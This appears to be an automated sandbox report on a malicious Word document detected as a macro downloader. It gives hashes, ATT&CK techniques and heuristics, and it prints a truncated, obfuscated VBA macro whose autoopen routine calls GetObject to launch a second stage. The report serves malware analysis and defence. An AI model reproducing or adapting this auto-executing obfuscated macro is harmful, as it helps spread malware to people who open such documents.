Office (OLE) malware analysis — malicious · f5ca2bb01cd70b29

MALICIOUS

Office (OLE)

185.0 KB Created: 2019-03-27 14:41:00 Authoring application: Microsoft Office Word First seen: 2019-04-21

MD5: 03e07a0532dc7e1bcdcf0243b9350f15 SHA-1: 145645e929a3c44fe440235bd3741e91c26eead7 SHA-256: f5ca2bb01cd70b2905fb37bbc02fed796fe635f7278822387fa99c36157c0096

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature Doc.Downloader.Sagent-6914418-0. High-severity heuristics indicate the presence of VBA macros, specifically an AutoOpen macro that utilizes GetObject for execution. The VBA script itself is heavily obfuscated, but the presence of auto-execution markers and the GetObject call strongly suggest it is designed to download and execute a second-stage payload.

Heuristics 7

ClamAV: Doc.Downloader.Sagent-6914418-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Sagent-6914418-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28651 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28651 bytes
SHA-256: `eec7727c7b5c5f81caf3535dbb49a9febbf927432fc2e4921f5a1906318ef7ad`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "CkAQcA" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "HAoXA1_X" Attribute VB_Base = "0{EBE6F477-B303-4598-9375-60BE047813DD}{2702FB28-6846-4E2C-92ED-056B286F11D6}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Z4BU4D4" Attribute VB_Base = "0{AAA210F5-9882-4399-AC87-F6B0CAE0DB89}{CBE1C865-EB3C-4969-A478-D476EEAB7DAA}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "hDBZAB" Function qQUUAGQ() If NACACUZ = A4AA_AA Then Q1A1AD = qBA4QA - Oct(331278819) / ZQD4wwZA - Sin(WQDCAxZ + _ Atn(977241109) - jooCGCwX * Log(305751311)) + (458786967 + _ CByte(264703690 / 465185178 + 203655251 * Cos(82432276))) + PX_4UQAG / Hex(ixG4oX + Cos(260009438) / EUxXcUD * 468433249) End If If Q1AQDA = HcDAQoA Then OUw_kG = BUxowBkA - Hex(528101112) / YA4AAZ - Hex(PXAAAoD + _ CByte(733832635) - EADBGQC * CDbl(233980342)) + (540149645 + _ CSng(355787251 / 710851249 + 465977666 * Cos(373301416))) + QAwcAAXk / Rnd(mwUADAAA + Cos(676312983) / PACCBXB * 598145508) End If If EwXQQADA = AAUAAA Then OUwAwA = F_wxAAC - Round(262308508) / jxA1X4GA - Oct(IQGQQD + _ Cos(170141531) - KxQAGAAA * Log(803271456)) + (493680211 + _ CDate(968561302 / 763747578 + 234455008 * Sqr(87881898))) + b4AUx1 / Atn(mBADUc_ + CBool(790424781) / jAAAABA * 553005649) End If If ZAABDkoD = Ic4AUCDQ Then zABwoBAA = pcoB_Q - Sqr(68331188) / VXBwDBAo - Cos(aBCx4B + _ Oct(966672806) - wAwoXDQ * Tan(957579480)) + (27188270 + _ CBool(671478167 / 802174613 + 453520323 * Cos(59099996))) + QABXUA / CSng(roXDDoQA + Hex(608953740) / YAAAAxBA * 494950968) End If If W1XAc4 = CUBXooD Then IACZoA = XQQ41QB - Log(782459971) / ucwwZDw - Fix(IAUAcZAG + _ Rnd(561936418) - mQD1xQ * Rnd(262199896)) + (392050985 + _ CDate(164135849 / 537032470 + 111801 * CInt(936863797))) + WAZ141U / Rnd(CAkcAA + Atn(225550600) / JD_BAQ * 66021371) End If If QACAAAxD = qACA_U Then GQAA1BAX = p1AoAUA - Sqr(954194030) / SQcDXAA - CByte(sUXGAoZA + _ CStr(211459845) - X1QBAAwA * Oct(441593240)) + (983030768 + _ CLng(770701634 / 744691332 + 947405755 * Hex(111814102))) + FAUCoww / CDate(ZBAC4AG + Round(327815156) / r11UAAo * 583811202) End If If iwQAZX = pAADX_A Then zAQBCk = VAUAxGU - Round(361382906) / jQXAkAQ - CLng(bcoDQBAw + _ CSng(709683583) - kDDAXQQ * Round(769418414)) + (829545629 + _ CInt(504451760 / 279386443 + 245274628 * Cos(472490872))) + VBG_AAA / Rnd(vUxQ1ADD + Tan(296566604) / aQAUADAA * 78051327) End If End Function Sub autoopen() On Error Resume Next If EA1UQCD = NCZU1AD Then hUZQAA = VwXAAUU - CBool(258779783) / bxBAxU - Sin(q1xkk1 + _ Sin(926433455) - fQB1Qox * Oct(199197996)) + (255086066 + _ CByte(376121828 / 20767113 + 976098434 * CInt(413870544))) + i_AAAZ / Atn(DCQAZA + Cos(866305272) / lAXcBUGc * 441909576) End If If L1_wAA = IxAGwcGQ Then tcAGZAAo = zAoUA4o - CSng(476945432) / zAoAwZ - Rnd(RB1AAxA + _ Oct(793087819) - NBBAxk * Hex(636202113)) + (616396799 + _ CDate(390529827 / 301493655 + 613691278 * Log(882553177))) + hAAw_CDk / Sin(A1AZA_A + CDbl(785860271) / FAwAAC * 544462726) End If If qUw4ooC = d4DAkAQ Then lAAAAA = qQAAAADD - Log(851254025) / JQAAcAD - CSng(wDBAwAGA + _ Sin(434504076) - CUGU1A * CBool(803862929)) + (341250382 + _ Tan(481099805 / 842291079 + 936115240 * CInt(419182756))) + EUA1B4 / Sqr(i1GxC4 + CLng(43871790) / MBAAAAA * 961154307) End If Set YoCoQ1C = GetObject(HAoXA1_X.IZBAAA4.Text + Z4BU4D4.i4ACXB + HAoXA1_X.IZBAAA4.Text) If BwXAA44o = NBA4kB Then QAA1D_ = sAQQACQD - Cos(27541042 ... (truncated)

SHA-256: eec7727c7b5c5f81caf3535dbb49a9febbf927432fc2e4921f5a1906318ef7ad

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "CkAQcA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HAoXA1_X"
Attribute VB_Base = "0{EBE6F477-B303-4598-9375-60BE047813DD}{2702FB28-6846-4E2C-92ED-056B286F11D6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Z4BU4D4"
Attribute VB_Base = "0{AAA210F5-9882-4399-AC87-F6B0CAE0DB89}{CBE1C865-EB3C-4969-A478-D476EEAB7DAA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "hDBZAB"
Function qQUUAGQ()
   If NACACUZ = A4AA_AA Then
Q1A1AD = qBA4QA - Oct(331278819) / ZQD4wwZA - Sin(WQDCAxZ + _
Atn(977241109) - jooCGCwX * Log(305751311)) + (458786967 + _
CByte(264703690 / 465185178 + 203655251 * Cos(82432276))) + PX_4UQAG / Hex(ixG4oX + Cos(260009438) / EUxXcUD * 468433249)
End If
   If Q1AQDA = HcDAQoA Then
OUw_kG = BUxowBkA - Hex(528101112) / YA4AAZ - Hex(PXAAAoD + _
CByte(733832635) - EADBGQC * CDbl(233980342)) + (540149645 + _
CSng(355787251 / 710851249 + 465977666 * Cos(373301416))) + QAwcAAXk / Rnd(mwUADAAA + Cos(676312983) / PACCBXB * 598145508)
End If
   If EwXQQADA = AAUAAA Then
OUwAwA = F_wxAAC - Round(262308508) / jxA1X4GA - Oct(IQGQQD + _
Cos(170141531) - KxQAGAAA * Log(803271456)) + (493680211 + _
CDate(968561302 / 763747578 + 234455008 * Sqr(87881898))) + b4AUx1 / Atn(mBADUc_ + CBool(790424781) / jAAAABA * 553005649)
End If
   If ZAABDkoD = Ic4AUCDQ Then
zABwoBAA = pcoB_Q - Sqr(68331188) / VXBwDBAo - Cos(aBCx4B + _
Oct(966672806) - wAwoXDQ * Tan(957579480)) + (27188270 + _
CBool(671478167 / 802174613 + 453520323 * Cos(59099996))) + QABXUA / CSng(roXDDoQA + Hex(608953740) / YAAAAxBA * 494950968)
End If
   If W1XAc4 = CUBXooD Then
IACZoA = XQQ41QB - Log(782459971) / ucwwZDw - Fix(IAUAcZAG + _
Rnd(561936418) - mQD1xQ * Rnd(262199896)) + (392050985 + _
CDate(164135849 / 537032470 + 111801 * CInt(936863797))) + WAZ141U / Rnd(CAkcAA + Atn(225550600) / JD_BAQ * 66021371)
End If
   If QACAAAxD = qACA_U Then
GQAA1BAX = p1AoAUA - Sqr(954194030) / SQcDXAA - CByte(sUXGAoZA + _
CStr(211459845) - X1QBAAwA * Oct(441593240)) + (983030768 + _
CLng(770701634 / 744691332 + 947405755 * Hex(111814102))) + FAUCoww / CDate(ZBAC4AG + Round(327815156) / r11UAAo * 583811202)
End If
   If iwQAZX = pAADX_A Then
zAQBCk = VAUAxGU - Round(361382906) / jQXAkAQ - CLng(bcoDQBAw + _
CSng(709683583) - kDDAXQQ * Round(769418414)) + (829545629 + _
CInt(504451760 / 279386443 + 245274628 * Cos(472490872))) + VBG_AAA / Rnd(vUxQ1ADD + Tan(296566604) / aQAUADAA * 78051327)
End If
End Function
Sub autoopen()
On Error Resume Next
   If EA1UQCD = NCZU1AD Then
hUZQAA = VwXAAUU - CBool(258779783) / bxBAxU - Sin(q1xkk1 + _
Sin(926433455) - fQB1Qox * Oct(199197996)) + (255086066 + _
CByte(376121828 / 20767113 + 976098434 * CInt(413870544))) + i_AAAZ / Atn(DCQAZA + Cos(866305272) / lAXcBUGc * 441909576)
End If
   If L1_wAA = IxAGwcGQ Then
tcAGZAAo = zAoUA4o - CSng(476945432) / zAoAwZ - Rnd(RB1AAxA + _
Oct(793087819) - NBBAxk * Hex(636202113)) + (616396799 + _
CDate(390529827 / 301493655 + 613691278 * Log(882553177))) + hAAw_CDk / Sin(A1AZA_A + CDbl(785860271) / FAwAAC * 544462726)
End If
   If qUw4ooC = d4DAkAQ Then
lAAAAA = qQAAAADD - Log(851254025) / JQAAcAD - CSng(wDBAwAGA + _
Sin(434504076) - CUGU1A * CBool(803862929)) + (341250382 + _
Tan(481099805 / 842291079 + 936115240 * CInt(419182756))) + EUA1B4 / Sqr(i1GxC4 + CLng(43871790) / MBAAAAA * 961154307)
End If
Set YoCoQ1C = GetObject(HAoXA1_X.IZBAAA4.Text + Z4BU4D4.i4ACXB + HAoXA1_X.IZBAAA4.Text)
   If BwXAA44o = NBA4kB Then
QAA1D_ = sAQQACQD - Cos(27541042
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.